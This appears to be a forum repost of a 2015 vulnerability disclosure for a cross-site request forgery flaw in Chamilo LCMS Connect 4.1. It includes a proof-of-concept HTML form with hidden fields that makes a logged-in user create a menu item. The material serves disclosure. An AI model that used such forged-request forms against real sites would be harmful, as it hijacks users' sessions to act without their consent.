Aerosol Posted March 28, 2015 Report Posted March 28, 2015 Hi Team,#Affected Vendor: http://lcms.chamilo.org/#Date: 27/03/2015#Discovered by: Joel Vadodil Varghese#Type of vulnerability: XSRF#Tested on: Windows 7#Product: LCMS Connect#Version: 4.1#Description: Chamilo is an open-source (under GNU/GPL licensing)e-learning and content management system, aimed at improving access toeducation and knowledge globally. Chamilo LCMS is a completely new softwareplatform for e-learning and collaboration. The application is vulnerable toXSRF attacks. If an attacker is able to lure a user into clicking a craftedlink or by embedding such a link within web pages he could control theuser's actions.#Proof of Concept (PoC):------------------------------------<form method="POST" name="form1" action="http://localhost:80/Chamilo/index.php?application=menu&go=creator&type=core\menu\ApplicationItem"><input type="hidden" name="parent" value="0"/><input type="hidden" name="title[de]" value=""/><input type="hidden" name="title[en]" value="tester"/><input type="hidden" name="title[fr]" value=""/><input type="hidden" name="title[nl]" value=""/><input type="hidden" name="application" value="weblcms"/><input type="hidden" name="submit_button" value="Create"/><input type="hidden" name="_qf__item" value=""/><input type="hidden" name="type" value="core\menu\ApplicationItem"/></form>-- Regards,*Joel V*Source Quote
